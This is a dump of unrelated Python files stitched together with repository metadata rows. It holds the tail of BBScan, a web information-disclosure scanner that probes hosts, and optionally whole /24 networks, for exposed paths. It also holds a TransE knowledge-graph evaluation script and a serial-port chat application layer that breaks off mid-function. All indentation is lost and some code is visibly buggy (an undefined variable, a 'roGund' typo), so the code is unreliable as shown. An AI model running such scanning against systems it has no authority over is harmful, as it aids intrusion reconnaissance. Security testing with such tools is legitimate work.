# calculate depth of a given URL, return tuple (url, depth)
def _cal_depth(self, url):
if url.find('#') >= 0:
url = url[:url.find('#')] # cut off fragment
if url.find('?') >= 0:
url = url[:url.find('?')] # cut off query string
if url.startswith('//'):
return '', 10000 # //www.baidu.com/index.php
if not urlparse.urlparse(url, 'http').scheme.startswith('http'):
return '', 10000 # no HTTP protocol
if url.lower().startswith('http'):
_ = urlparse.urlparse(url, 'http')
if _.netloc == self.host: # same hostname
url = _.path
else:
return '', 10000 # not the same hostname
while url.find('//') >= 0:
url = url.replace('//', '/')
if not url:
return '/', 1 # http://www.example.com
if url[0] != '/':
url = '/' + url
url = url[: url.rfind('/')+1]
if url.split('/')[-2].find('.') > 0:
url = '/'.join(url.split('/')[:-2]) + '/'
depth = url.count('/')
return url, depth
#
# load urls from rules/*.txt
def _init_rules(self):
self.text_to_find = []
self.regex_to_find = []
self.text_to_exclude = []
self.regex_to_exclude = []
self.rules_set = set()
p_tag = re.compile('{tag="([^"]+)"}')
p_status = re.compile('{status=(\d{3})}')
p_content_type = re.compile('{type="([^"]+)"}')
p_content_type_no = re.compile('{type_no="([^"]+)"}')
for rule_file in glob.glob('rules/*.txt'):
with open(rule_file, 'r') as infile:
for url in infile.xreadlines():
url = url.strip()
if url.startswith('/'):
_ = p_tag.search(url)
tag = _.group(1).replace("{quote}", '"') if _ else ''
_ = p_status.search(url)
status = int(_.group(1)) if _ else 0
_ = p_content_type.search(url)
content_type = _.group(1) if _ else ''
_ = p_content_type_no.search(url)
content_type_no = _.group(1) if _ else ''
rule = (url.split()[0], tag, status, content_type, content_type_no)
if rule not in self.rules_set:
self.rules_set.add(rule)
re_text = re.compile('{text="(.*)"}')
re_regex_text = re.compile('{regex_text="(.*)"}')
_file_path = 'rules/white.list'
if not os.path.exists(_file_path):
return
for line in open(_file_path):
line = line.strip()
if not line or line.startswith('#'):
continue
_m = re_text.search(line)
if _m:
self.text_to_find.append(
_m.group(1).decode('utf-8', 'ignore')
)
else:
_m = re_regex_text.search(line)
if _m:
self.regex_to_find.append(
re.compile(_m.group(1).decode('utf-8', 'ignore'))
)
_file_path = 'rules/black.list'
if not os.path.exists(_file_path):
return
for line in open(_file_path):
line = line.strip()
if not line or line.startswith('#'):
continue
_m = re_text.search(line)
if _m:
self.text_to_exclude.append(
_m.group(1).decode('utf-8', 'ignore')
)
else:
_m = re_regex_text.search(line)
if _m:
self.regex_to_exclude.append(
re.compile(_m.group(1).decode('utf-8', 'ignore'))
)
#
def _http_request(self, url, timeout=20):
try:
if not url:
url = '/'
url = self.base_url + url
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 '
'(KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36 BBScan/1.2',
'Range': 'bytes=0-10240',
'Connection': 'keep-alive'
}
resp = self.session.get(url, headers=headers, timeout=(3.0, timeout))
resp_headers = resp.headers
status = resp.status_code
if resp_headers.get('content-type', '').find('text') >= 0 \
or resp_headers.get('content-type', '').find('html') >= 0 \
or int(resp_headers.get('content-length', '0')) <= 10240:
html_doc = decode_response_text(resp.content)
else:
html_doc = ''
return status, resp_headers, html_doc
except:
return -1, {}, ''
#
def check_404(self):
try:
try:
self._404_status, headers, html_doc = self._http_request('/BBScan-404-existence-check')
except:
self._404_status, headers, html_doc = -1, {}, ''
self.has_404 = (self._404_status == 404)
if not self.has_404:
self.len_404_doc = len(html_doc)
return self.has_404
except Exception, e:
logging.error('[Check_404] Exception %s' % str(e))
#
def _enqueue(self, url):
url = str(url)
url_pattern = re.sub('\d+', '{num}', url)
if url_pattern in self.urls_processed or len(self.urls_processed) >= self.LINKS_LIMIT:
return False
else:
self.urls_processed.add(url_pattern)
# print url
for _ in self.rules_set:
try:
full_url = url.rstrip('/') + _[0]
except:
continue
if full_url in self.urls_enqueued:
continue
url_description = {'prefix': url.rstrip('/'), 'full_url': full_url}
item = (url_description, _[1], _[2], _[3], _[4])
self.url_queue.put(item)
self.urls_enqueued.add(full_url)
if self.full_scan and url.count('/') >= 3:
self._enqueue('/'.join(url.split('/')[:-2]) + '/') # sub folder enqueue
return True
#
def crawl_index(self, path):
try:
status, headers, html_doc = self._http_request(path)
if status != 200:
try:
html_doc = self.session.get(self.url, headers={'Connection': 'close'}).text
except Exception, e:
pass
soup = BeautifulSoup(html_doc, "html.parser")
for link in soup.find_all('a'):
url = link.get('href', '').strip()
url, depth = self._cal_depth(url)
if depth <= self.max_depth:
self._enqueue(url)
if self.find_text(html_doc):
self.results['/'] = []
m = re.search('<title>(.*?)</title>', html_doc)
title = m.group(1) if m else ''
_ = {'status': status, 'url': '%s%s' % (self.base_url, path), 'title': title}
if _ not in self.results['/']:
self.results['/'].append(_)
except Exception, e:
logging.error('[crawl_index Exception] %s' % str(e))
traceback.print_exc()
#
def load_all_urls_from_file(self):
try:
with open(self.log_file) as inFile:
for line in inFile.xreadlines():
_ = line.strip().split()
if len(_) == 3 and (_[2].find('^^^200') > 0 or _[2].find('^^^403') > 0 or _[2].find('^^^302') > 0):
url, depth = self._cal_depth(url)
self._enqueue(url)
except Exception, e:
logging.error('[load_all_urls_from_file Exception] %s' % str(e))
traceback.print_exc()
#
def find_text(self, html_doc):
for _text in self.text_to_find:
if html_doc.find(_text) > 0:
return True
for _regex in self.regex_to_find:
if _regex.search(html_doc) > 0:
return True
return False
#
def exclude_text(self, html_doc):
for _text in self.text_to_exclude:
if html_doc.find(_text) > 0:
return False
for _regex in self.regex_to_exclude:
if _regex.search(html_doc) > 0:
return False
return True
#
def _scan_worker(self):
while self.url_queue.qsize() > 0:
if time.time() - self.START_TIME > self.TIME_OUT:
self.url_queue.queue.clear()
print '[%s] [ERROR] Timed out task: %s' % (get_time(), self.host)
return
try:
item = self.url_queue.get(timeout=0.1)
except:
return
try:
url_description, tag, code, content_type, content_type_no = item
prefix = url_description['prefix']
url = url_description['full_url']
url = url.replace('{sub}', self.host.split('.')[0])
if url.find('{hostname_or_folder}') >= 0:
_url = url[: url.find('{hostname_or_folder}')]
folders = _url.split('/')
for _folder in reversed(folders):
if _folder not in ['', '.', '..']:
url = url.replace('{hostname_or_folder}', _folder)
break
url = url.replace('{hostname_or_folder}', self.host.split(':')[0])
url = url.replace('{hostname}', self.host.split(':')[0])
if url.find('{parent}') > 0:
if url.count('/') < 2:
continue
ret = url.split('/')
ret[-2] = ret[-1].replace('{parent}', ret[-2])
url = '/' + '/'.join(ret[:-1])
except Exception, e:
logging.error('[_scan_worker Exception] [1] %s' % str(e))
continue
if not item or not url:
break
# print '[%s]' % url.strip()
try:
status, headers, html_doc = self._http_request(url)
cur_content_type = headers.get('content-type', '')
if cur_content_type.find('image/') >= 0: # exclude image type
continue
if len(html_doc) < 10: # data too short
continue
if not self.exclude_text(html_doc): # exclude text found
continue
valid_item = False
if self.find_text(html_doc):
valid_item = True
else:
if status != code and status in [301, 302, 400, 404, 500, 501, 502, 503, 505]:
continue
if cur_content_type.find('application/json') >= 0 and \
not url.endswith('.json'): # no json
continue
if tag:
if html_doc.find(tag) >= 0:
valid_item = True
else:
continue # tag mismatch
if content_type and cur_content_type.find(content_type) < 0 \
or content_type_no and cur_content_type.find(content_type_no) >= 0:
continue # type mismatch
if self.has_404 or status != self._404_status:
if code and status != code and status != 206: # code mismatch
continue
elif code != 403 and status == 403:
continue
else:
valid_item = True
if not self.has_404 and status in (200, 206) and url != '/' and not tag:
_len = len(html_doc)
_min = min(_len, self.len_404_doc)
if _min == 0:
_min = 10.0
if float(_len - self.len_404_doc) / _min > 0.3:
valid_item = True
if status == 206:
if cur_content_type.find('text') < 0 and cur_content_type.find('html') < 0:
valid_item = True
if valid_item:
self.lock.acquire()
# print '[+] [Prefix:%s] [%s] %s' % (prefix, status, 'http://' + self.host + url)
if prefix not in self.results:
self.results[prefix] = []
m = re.search('<title>(.*?)</title>', html_doc)
title = m.group(1) if m else ''
_ = {'status': status, 'url': '%s%s' % (self.base_url, url), 'title': title}
if _ not in self.results[prefix]:
self.results[prefix].append(_)
self.lock.release()
if len(self.results) >= 10:
print '[ERROR] Over 10 vulnerabilities found [%s], seems to be false positives.' % prefix
self.url_queue.queue.clear()
except Exception, e:
logging.error('[_scan_worker.Exception][2][%s] %s' % (url, str(e)))
traceback.print_exc()
#
def scan(self, threads=6):
try:
threads_list = []
for i in range(threads):
t = threading.Thread(target=self._scan_worker)
threads_list.append(t)
t.start()
for t in threads_list:
t.join()
for key in self.results.keys():
if len(self.results[key]) > 10: # Over 10 URLs found under this folder: false positives
del self.results[key]
return self.host, self.results
except Exception, e:
print '[scan exception] %s' % str(e)
finally:
self.session.close()
def batch_scan(q_targets, q_results, lock, args):
s = InfoDisScanner(args.timeout*60, args=args)
while True:
try:
target = q_targets.get(timeout=1.0)
except:
break
_url = target['url']
_file = target['file']
if _url:
s.init_from_url(_url)
else:
if os.path.getsize(_file) == 0:
continue
s.init_from_log_file(_file)
if s.host == '':
continue
host, results = s.scan(threads=args.t)
if results:
q_results.put((host, results))
lock.acquire()
for key in results.keys():
for url in results[key]:
print '[+] [%s] %s' % (url['status'], url['url'])
lock.release()
def save_report_thread(q_results, file):
start_time = time.time()
if args.md:
a_template = template['markdown']
else:
a_template = template['html']
t_general = Template(a_template['general'])
t_host = Template(a_template['host'])
t_list_item = Template(a_template['list_item'])
output_file_suffix = a_template['suffix']
all_results = []
report_name = os.path.basename(file).lower().replace('.txt', '') \
+ '_' + time.strftime('%Y%m%d_%H%M%S', time.localtime()) + output_file_suffix
global STOP_ME
try:
while not STOP_ME:
if q_results.qsize() == 0:
time.sleep(0.1)
continue
html_doc = ""
while q_results.qsize() > 0:
all_results.append(q_results.get())
for item in all_results:
host, results = item
_str = ""
for key in results.keys():
for _ in results[key]:
_str += t_list_item.substitute(
{'status': _['status'], 'url': _['url'], 'title': _['title']}
)
_str = t_host.substitute({'host': host, 'list': _str})
html_doc += _str
cost_time = time.time() - start_time
cost_min = int(cost_time / 60)
cost_seconds = '%.2f' % (cost_time % 60)
html_doc = t_general.substitute(
{'cost_min': cost_min, 'cost_seconds': cost_seconds, 'content': html_doc}
)
with codecs.open('report/%s' % report_name, 'w', encoding='utf-8') as outFile:
outFile.write(html_doc)
if all_results:
print '[%s] Scan report saved to report/%s' % (get_time(), report_name)
if args.browser:
webbrowser.open_new_tab(os.path.abspath('report/%s' % report_name))
else:
lock.acquire()
print '[%s] No vulnerabilities found on sites in %s.' % (get_time(), file)
lock.release()
except Exception, e:
print '[save_report_thread Exception] %s %s' % (type(e), str(e))
sys.exit(-1)
def domain_lookup():
r = Resolver()
r.timeout = r.lifetime = 8.0
while True:
try:
host = q_hosts.get(timeout=0.1)
print "[%s] host=> %s" % ("domain_lookup", host)
except:
break
_schema, _host, _path = parse_url(host)
try:
m = re.search('\d+\.\d+\.\d+\.\d+', _host.split(':')[0])
if m:
q_targets.put({'file': '', 'url': host})
ips_to_scan.append(m.group(0))
else:
answers = r.query(_host.split(':')[0])
if answers:
q_targets.put({'file': '', 'url': host})
for _ in answers:
ips_to_scan.append(_.address)
except Exception, e:
lock.acquire()
print '[%s][Warning] Invalid domain:', (get_time(), host)
lock.release()
if __name__ == '__main__':
args = parse_args()
if args.f:
input_files = [args.f]
elif args.d:
input_files = glob.glob(args.d + '/*.txt')
elif args.crawler:
input_files = ['crawler']
elif args.host:
input_files = ['hosts'] # several hosts on command line
ips_to_scan = [] # all IPs to be scanned during current scan
for file in input_files:
if args.host:
lines = [' '.join(args.host)]
elif args.f or args.d:
with open(file) as inFile:
lines = inFile.readlines()
try:
print '[%s] Batch web scan start.' % get_time()
q_results = multiprocessing.Manager().Queue()
q_targets = multiprocessing.Manager().Queue()
lock = multiprocessing.Manager().Lock()
STOP_ME = False
threading.Thread(target=save_report_thread, args=(q_results, file)).start()
print '[%s] Report thread created, prepare target Queue...' % get_time()
if args.crawler:
_input_files = glob.glob(args.crawler + '/*.log')
for _file in _input_files:
q_targets.put({'file': _file, 'url': ''})
if args.host or args.f or args.d:
q_hosts = Queue.Queue()
for line in lines:
if line.strip():
# Works with https://github.com/lijiejie/subDomainsBrute
# delimiter "," is acceptable
hosts = line.replace(',', ' ').strip().split()
for host in hosts:
q_hosts.put(host)
all_threads = []
for _ in range(20):
t = threading.Thread(target=domain_lookup)
all_threads.append(t)
t.start()
for t in all_threads:
t.join()
if args.network != 32:
for ip in ips_to_scan:
if ip.find('/') > 0:
continue
_network = u'%s/%s' % ('.'.join(ip.split('.')[:3]), args.network)
if _network in ips_to_scan:
continue
ips_to_scan.append(_network)
_ips = ipaddress.IPv4Network(u'%s/%s' % (ip, args.network), strict=False).hosts()
for _ip in _ips:
_ip = str(_ip)
if _ip not in ips_to_scan:
ips_to_scan.append(_ip)
q_targets.put({'file': '', 'url': _ip})
print '[%s] %s targets entered Queue.' % (get_time(), q_targets.qsize())
print '[%s] Create %s sub Processes...' % (get_time(), args.p)
scan_process = []
for _ in range(args.p):
p = multiprocessing.Process(target=batch_scan, args=(q_targets, q_results, lock, args))
p.daemon = True
p.start()
scan_process.append(p)
print '[%s] %s sub process successfully created.' % (get_time(), args.p)
for p in scan_process:
p.join()
except KeyboardInterrupt, e:
print '[+] [%s] User aborted, running tasks crashed.' % get_time()
try:
while True:
q_targets.get_nowait()
except:
pass
except Exception, e:
print '[__main__.exception] %s %s' % (type(e), str(e))
traceback.print_exc()
STOP_ME = True
|
[
"xiaoyan_jia1@163.com"
] |
xiaoyan_jia1@163.com
|
f86bc180d693ab21bdd9ff67555b9281d39ac601
|
73f2b42955f151718a47a6d93a4f7175830edbac
|
/AWML_TransE/evaluation_tc.py
|
49455a94df40d53653698640cdbaf31a571dfa37
|
[] |
no_license
|
orangegcc/AWML
|
d1e6b501cbdb1297fc56de9736a75e3f89b59593
|
f9943eaa61b22618c759d51d7976b0878045cf24
|
refs/heads/master
| 2020-03-30T15:12:32.055863
| 2018-10-10T13:37:52
| 2018-10-10T13:37:52
| 151,352,947
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,304
|
py
|
#! /usr/bin/python
import sys
import cPickle
from modelC import *
def load_file(path):
return scipy.sparse.csr_matrix(cPickle.load(open(path)),
dtype=theano.config.floatX)
def convert2idx(spmat):
rows, cols = spmat.nonzero()
return rows[np.argsort(cols)]
def RankingEval(datapath='../data_WN18/', dataset='WN-test',
loadmodel='best_valid_model.pkl', neval='all', Nsyn=40943, n=1,
idx2synsetfile='WN_idx2synset.pkl'):
# Load model
f = open(loadmodel)
embeddings = cPickle.load(f)
f.close()
leftop = LayerTrans()
rightop = Unstructured()
simfn = eval('L1sim')
# Load data
testl = load_file(datapath + dataset + '-lhs.pkl')
testr = load_file(datapath + dataset + '-rhs.pkl')
testo = load_file(datapath + dataset + '-rel.pkl')
if type(embeddings) is list:
testo = testo[-18:, :]
# Convert sparse matrix to indexes
if neval == 'all':
idxtl = convert2idx(testl)
idxtr = convert2idx(testr)
idxto = convert2idx(testo)
else:
idxtl = convert2idx(testl)[:neval]
idxtr = convert2idx(testr)[:neval]
idxto = convert2idx(testo)[:neval]
# Positives
trainl = load_file(datapath + 'WN-train-lhs.pkl')
trainr = load_file(datapath + 'WN-train-rhs.pkl')
traino = load_file(datapath + 'WN-train-rel.pkl')
traino = traino[-18:, :]
# Valid set
validl = load_file(datapath + 'WN-valid-lhs.pkl')
validr = load_file(datapath + 'WN-valid-rhs.pkl')
valido = load_file(datapath + 'WN-valid-rel.pkl')
valido = valido[-18:, :]
idxl = convert2idx(trainl)
idxr = convert2idx(trainr)
idxo = convert2idx(traino)
idxvl = convert2idx(validl)
idxvr = convert2idx(validr)
idxvo = convert2idx(valido)
true_triples = np.concatenate([idxtl,idxvl,idxl,idxto,idxvo,idxo,idxtr,idxvr,idxr]).reshape(3,idxtl.shape[0]+idxvl.shape[0]+idxl.shape[0]).T
rankofunc = RankRelFnIdx(simfn, embeddings, leftop, rightop,
subtensorspec=Nsyn)
'''with open('rel2subrel_apC.pkl','rb') as f:
rel2subrel = cPickle.load(f)'''
res = FilteredRankingScoreRelIdx(rankofunc, idxtl, idxtr, idxto, true_triples)
dres = {}
dres.update({'micromean': np.mean(res)})
dres.update({'micromedian': np.median(res)})
dres.update({'microhits@n': np.mean(np.asarray(res) <= n) * 100})
print "### MICRO:"
print "\t-- global >> mean: %s, median: %s, hits@%s: %s%%" % (
round(dres['micromean'], 5), round(dres['micromedian'], 5),
n, round(dres['microhits@n'], 3))
''' listrel = set(idxo)
dictrelres = {}
dictrellmean = {}
dictrelrmean = {}
dictrelgmean = {}
dictrellmedian = {}
dictrelrmedian = {}
dictrelgmedian = {}
dictrellrn = {}
dictrelrrn = {}
dictrelgrn = {}
for i in listrel:
dictrelres.update({i: [[], []]})
for i, j in enumerate(res[0]):
dictrelres[idxto[i]][0] += [j]
for i, j in enumerate(res[1]):
dictrelres[idxto[i]][1] += [j]
for i in listrel:
dictrellmean[i] = np.mean(dictrelres[i][0])
dictrelrmean[i] = np.mean(dictrelres[i][1])
dictrelgmean[i] = np.mean(dictrelres[i][0] + dictrelres[i][1])
dictrellmedian[i] = np.median(dictrelres[i][0])
dictrelrmedian[i] = np.median(dictrelres[i][1])
dictrelgmedian[i] = np.median(dictrelres[i][0] + dictrelres[i][1])
dictrellrn[i] = np.mean(np.asarray(dictrelres[i][0]) <= n) * 100
dictrelrrn[i] = np.mean(np.asarray(dictrelres[i][1]) <= n) * 100
dictrelgrn[i] = np.mean(np.asarray(dictrelres[i][0] +
dictrelres[i][1]) <= n) * 100
dres.update({'dictrelres': dictrelres})
dres.update({'dictrellmean': dictrellmean})
dres.update({'dictrelrmean': dictrelrmean})
dres.update({'dictrelgmean': dictrelgmean})
dres.update({'dictrellmedian': dictrellmedian})
dres.update({'dictrelrmedian': dictrelrmedian})
dres.update({'dictrelgmedian': dictrelgmedian})
dres.update({'dictrellrn': dictrellrn})
dres.update({'dictrelrrn': dictrelrrn})
dres.update({'dictrelgrn': dictrelgrn})
dres.update({'macrolmean': np.mean(dictrellmean.values())})
dres.update({'macrolmedian': np.mean(dictrellmedian.values())})
dres.update({'macrolhits@n': np.mean(dictrellrn.values())})
dres.update({'macrormean': np.mean(dictrelrmean.values())})
dres.update({'macrormedian': np.mean(dictrelrmedian.values())})
dres.update({'macrorhits@n': np.mean(dictrelrrn.values())})
dres.update({'macrogmean': np.mean(dictrelgmean.values())})
dres.update({'macrogmedian': np.mean(dictrelgmedian.values())})
dres.update({'macroghits@n': np.mean(dictrelgrn.values())})
print "### MACRO:"
print "\t-- left >> mean: %s, median: %s, hits@%s: %s%%" % (
round(dres['macrolmean'], 5), round(dres['macrolmedian'], 5),
n, round(dres['macrolhits@n'], 3))
print "\t-- right >> mean: %s, median: %s, hits@%s: %s%%" % (
round(dres['macrormean'], 5), round(dres['macrormedian'], 5),
n, round(dres['macrorhits@n'], 3))
print "\t-- global >> mean: %s, median: %s, hits@%s: %s%%" % (
round(dres['macrogmean'], 5), round(dres['macrogmedian'], 5),
n, round(dres['macroghits@n'], 3))
idx2synset = cPickle.load(open(datapath + idx2synsetfile))
offset = 0
if type(embeddings) is list:
idxto = idxto[-embeddings[1].N:, :]
offset = l.shape[0] - embeddings[1].N
for i in np.sort(list(listrel)):
print "### RELATION %s:" % idx2synset[offset + i]
print "\t-- left >> mean: %s, median: %s, hits@%s: %s%%, N: %s" % (
round(dictrellmean[i], 5), round(dictrellmedian[i], 5),
n, round(dictrellrn[i], 3), len(dictrelres[i][0]))
print "\t-- right >> mean: %s, median: %s, hits@%s: %s%%, N: %s" % (
round(dictrelrmean[i], 5), round(dictrelrmedian[i], 5),
n, round(dictrelrrn[i], 3), len(dictrelres[i][1]))
print "\t-- global >> mean: %s, median: %s, hits@%s: %s%%, N: %s" % (
roGund(dictrelgmean[i], 5), round(dictrelgmedian[i], 5),
n, round(dictrelgrn[i], 3),
len(dictrelres[i][0] + dictrelres[i][1]))
'''
return dres
def ClassifEval(datapath='../data_WN18/', validset='WN-valid', testset='WN-test',
loadmodel='best_valid_model.pkl', seed=647):
# Load model
f = open(loadmodel)
embeddings = cPickle.load(f)
leftop = cPickle.load(f)
rightop = cPickle.load(f)
simfn = cPickle.load(f)
f.close()
np.random.seed(seed)
# Load data
lv = load_file(datapath + validset + '-lhs.pkl')
lvn = lv[:, np.random.permutation(lv.shape[1])]
rv = load_file(datapath + validset + '-rhs.pkl')
rvn = rv[:, np.random.permutation(lv.shape[1])]
ov = load_file(datapath + validset + '-rel.pkl')
ovn = ov[:, np.random.permutation(lv.shape[1])]
if type(embeddings) is list:
ov = ov[-embeddings[1].N:, :]
ovn = ovn[-embeddings[1].N:, :]
# Load data
lt = load_file(datapath + testset + '-lhs.pkl')
ltn = lt[:, np.random.permutation(lv.shape[1])]
rt = load_file(datapath + testset + '-rhs.pkl')
rtn = rt[:, np.random.permutation(lv.shape[1])]
ot = load_file(datapath + testset + '-rel.pkl')
otn = ot[:, np.random.permutation(lv.shape[1])]
if type(embeddings) is list:
ot = ot[-embeddings[1].N:, :]
otn = otn[-embeddings[1].N:, :]
simfunc = SimFn(simfn, embeddings, leftop, rightop)
resv = simfunc(lv, rv, ov)[0]
resvn = simfunc(lvn, rvn, ovn)[0]
rest = simfunc(lt, rt, ot)[0]
restn = simfunc(ltn, rtn, otn)[0]
# Threshold
perf = 0
T = 0
for val in list(np.concatenate([resv, resvn])):
tmpperf = (resv > val).sum() + (resvn <= val).sum()
if tmpperf > perf:
perf = tmpperf
T = val
testperf = ((rest > T).sum() + (restn <= T).sum()) / float(2 * len(rest))
print "### Classification performance : %s%%" % round(testperf * 100, 3)
return testperf
if __name__ == '__main__':
#ClassifEval()
RankingEval(loadmodel=sys.argv[1])
|
[
"orangegcc@bupt.edu.cn"
] |
orangegcc@bupt.edu.cn
|
b289fce0628cac0aed162d7e3cd44991042fac2a
|
eedc92c3c382107de89c71ee3fce50ed1b76bc77
|
/src/internals/adapters/http/__init__.py
|
5a35e220e6920ed1607bf25fd7db8e413693ce54
|
[
"MIT"
] |
permissive
|
mabel-dev/rosey
|
01f60570f3513df7ff6e666a63de1208fa9fb609
|
b48b9920b1eec972a185be75741ede53b8f3de34
|
refs/heads/main
| 2023-05-29T00:00:10.630357
| 2021-06-13T19:33:27
| 2021-06-13T19:33:27
| 362,224,667
| 0
| 0
|
MIT
| 2021-06-14T03:00:21
| 2021-04-27T19:14:49
|
Python
|
UTF-8
|
Python
| false
| false
| 73
|
py
|
from .http_adapter import HttpAdapter, GetRequestModel, PostRequestModel
|
[
"justin.joyce+rosey@joocer.com"
] |
justin.joyce+rosey@joocer.com
|
74f45ffa09fc6e70f46d76001e3054e4fd5a37e1
|
837be787b2e2ca0c4fe40eea49dc59a4a7b07ada
|
/net_layers/app_layer.py
|
df82a228d8b789bf1b1fa701de042ef70a452709
|
[] |
no_license
|
SvetaZlobina/serial-port-driver
|
1a31d072f47899cec3397f8d0292721a83be830f
|
b0be42a26005a114023dd68fc3bc5132eb67dee2
|
refs/heads/master
| 2020-03-14T18:15:15.284250
| 2019-08-01T08:58:09
| 2019-08-01T08:58:09
| 131,737,755
| 0
| 1
| null | 2018-05-15T10:18:49
| 2018-05-01T16:45:40
|
Python
|
UTF-8
|
Python
| false
| false
| 14,416
|
py
|
import os
import time
class AppLayer:
msg_types = {'FILE': b'f',
'MSG': b'm',
'FILE_END': b'l',
'FILE_PROPOSE': b'p',
'FILE_ACK': b'a',
'FILE_NAK': b'n'}
MSG_TYPE_LEN = 1 # Длина поля типа сообщения в байтах
MSG_SIZE_LEN = 1 # Длина поля размера сообщения в байтах
FNAME_SIZE_LEN = 1 # Длина поля размера названия файла в байтах
DATA_SIZE_LEN = 4 # Длина поля размера данных в сообщении в байтах
def __init__(self, datalink_layer):
self.dl_layer = datalink_layer
self.save_dir_name = '.'
self.text_buffer = ''
self.status = 'Free'
def check_received(self):
"""
Проверка, было ли получено какое-либо сообщение на канальном уровне.
:return: само сообщениие в utf-8
"""
if self.status != 'Free':
return None
bytes_str = self.dl_layer.check_received()
if bytes_str is None:
return None
msg_type = self._deform_message(bytes_str)['msg_type']
if msg_type not in self.msg_types.values():
raise ValueError("Received unknown message type. It's {}".format(msg_type))
if msg_type == self.msg_types['MSG']:
return self.receive_msg(bytes_str)
elif msg_type == self.msg_types['FILE_PROPOSE']:
return self.receive_file_proposal(bytes_str)
elif msg_type == self.msg_types['FILE']:
return self.receive_file(bytes_str)
elif msg_type == self.msg_types['FILE_END']:
return self.receive_file_completely(bytes_str)
elif msg_type == self.msg_types['FILE_ACK'] or msg_type == self.msg_types['FILE_NAK']:
return self.send_file(bytes_str)
else:
raise ValueError("Don't know how to process {} at app_layer.check_received".format(msg_type))
def send_file_propose(self, fname):
"""
Отправление сообщения с предложением принять файл.
:param fname: абсолютное имя файла
:return:
"""
self._send_message(self.msg_types['FILE_PROPOSE'], fname=fname)
def receive_file_proposal(self, bytes_str):
"""
Получение и обработка предложения принять файл.
С помощью исключения FileProposal сообщение "Принять файл или отказаться" передаётся в интерфейс приложения
:param bytes_str: Строка с предложением
:return:
"""
fname = self._deform_message(bytes_str)['fname']
raise self.FileProposal(fname)
def send_file_ack(self, fname, save_dir_name):
"""
Передача сообщения с согласием принять файл.
:param fname: Абсолютное имя файла
:param save_dir_name: Имя папки для сохранения полученного файла
:return:
"""
self.save_dir_name = save_dir_name
self._send_message(self.msg_types['FILE_ACK'], fname=fname)
def send_file_nak(self, fname):
"""
Передача сообщения с отказом принять файл
:param fname: Абсолютное имя файла
:return:
"""
self._send_message(self.msg_types['FILE_NAK'], fname=fname)
def send_msg(self, msg):
"""
Передача "сообщения", в смысле сообщения в чате
:param msg: текст "сообщения"
:return:
"""
self._send_message(self.msg_types['MSG'], data=msg)
def receive_msg(self, bytes_str):
"""
Получение "сообщения", в смысле сообщения в чате
:param bytes_str: данные из канального уровня
:return: кортеж (отправитель, текст сообщения)
"""
self.status = 'Receiving message'
msg = self._deform_message(bytes_str)['msg']
self.status = 'Free'
return msg
def send_file(self, bytes_str):
"""
Отправка файла через сеть.
:param bytes_str: строка с согласием или отказом принять файл от другого пользователя
:return: сообщение об отправке файла
"""
msg_type, fname = [self._deform_message(bytes_str)[x] for x in ['msg_type', 'fname']]
if msg_type == self.msg_types['FILE_NAK']:
raise self.FileNotAcknowledged(fname)
try:
with open(fname, 'rb') as f:
for line in f:
if self.dl_layer.is_paused:
# curr_position = f.tell()
while self.dl_layer.is_paused:
print('sending is paused')
msg = self.dl_layer.check_received()
time.sleep(1)
print('line to send:', line.decode('utf-8'))
self._send_message(self.msg_types['FILE'], fname=self.short_fname(fname), data=line)
except Exception as e:
print("Error trying to read file before sending.\n_Particular error is {}".format(e.args))
raise self.FailedSend(e.args)
self._send_message(self.msg_types['FILE_END'], fname=self.short_fname(fname))
return_str = '### Файл {} успешно отправлен ###'.format(self.short_fname(fname))
return bytes(return_str, 'utf-8')
def pause_receiving_file(self):
'''
Приостановка получения файла
:return:
'''
self.dl_layer.is_paused = True
def resume_receiving_file(self):
'''
Продолжение получения файла
:return:
'''
self.dl_layer.is_paused = False
self.dl_layer.send_rsm()
def receive_file(self, bytes_str):
"""
Получение файла из сети.
:param bytes_str: Строка из канального уровня.
:return: кортеж (отправитель "В", сообщение о получении файла)
"""
self.status = 'Receiving file'
print('bytes before deroming:', bytes_str)
fname, data = [self._deform_message(bytes_str)[x] for x in ['fname', 'data']]
print('fname after deforming:', fname)
print('data after deforming:', data)
# print('data in receive_file:', data.decode('utf-8'))
if os.path.exists(os.path.join(self.save_dir_name, fname)):
with open(os.path.join(self.save_dir_name, fname), 'ab') as f:
f.write(data)
else:
with open(os.path.join(self.save_dir_name, fname), 'wb') as f:
f.write(data)
self.status = 'Free'
if self.dl_layer.is_paused:
self.text_buffer = data
return None
else:
if self.text_buffer != '':
data = self.text_buffer + data
self.text_buffer = ''
return data
else:
return data
def receive_file_completely(self, bytes_str):
'''
Получение сообщения о конце файла
:param bytes_str:
:return:
'''
self.status = 'Receiving file'
fname = self._deform_message(bytes_str)['fname']
self.status = 'Free'
return_str = '\n### Файл {} полностью принят и сохранён ###\n'.format(fname)
return bytes(return_str, 'utf-8')
def set_connection(self, port_name):
"""
Установка соединения с заданным портом
:param port_name: имя порта для подключения
:return: результат подключения. None - если всё хорошо
"""
return self.dl_layer.set_connection(port_name)
@staticmethod
def short_fname(fname):
"""
Генерация "короткого" относительного пути файла
:param fname: абсолютный путь к файлу
:return: относительный путь к файлу
"""
return fname.split('/')[-1]
def _send_message(self, msg_type, fname=None, data=None):
"""
Общий алгоритм для отправки сообщения через сеть.
:param msg_type: тип сообщения
:param fname: абсолютный путь к файлу, если требуется
:param data: данные для передачи, если требуются
:return:
"""
self.status = 'Sending {}'.format(filter(lambda k: self.msg_types[k] == msg_type, self.msg_types))
if data:
print('data before forming:', data)
bytes_str = self._form_message(msg_type, fname=fname, data=data)
print('bytes after forming:', bytes_str)
# print('bytes after forming decoded:', bytes_str.decode('utf-8'))
try:
self.dl_layer.send_msg(bytes_str)
except ConnectionError as e:
self.status = 'Free'
raise self.FailedSend(e.args)
self.status = 'Free'
def _form_message(self, msg_type, data=None, fname=None):
"""
Обобщённое формирование сообщения на основе его типа и содержания
:param msg_type: тип сообщения
:param data: данные сообщения, если требуется
:param fname: абсолютное имя файла, если требуется
:return: сформированное сообщение для отправки через сеть
"""
def form(data, bytes_size_len, to_encode=True):
if data is None:
raise ValueError('No data passed to form function in form_message')
data_bytes = data.encode() if to_encode else data
if len(data_bytes) > 256**bytes_size_len:
raise OverflowError('Too large data to put its len into {} bytes'.format(bytes_size_len))
data_bytes_len = len(data_bytes)
return data_bytes_len.to_bytes(bytes_size_len, 'big') + data_bytes
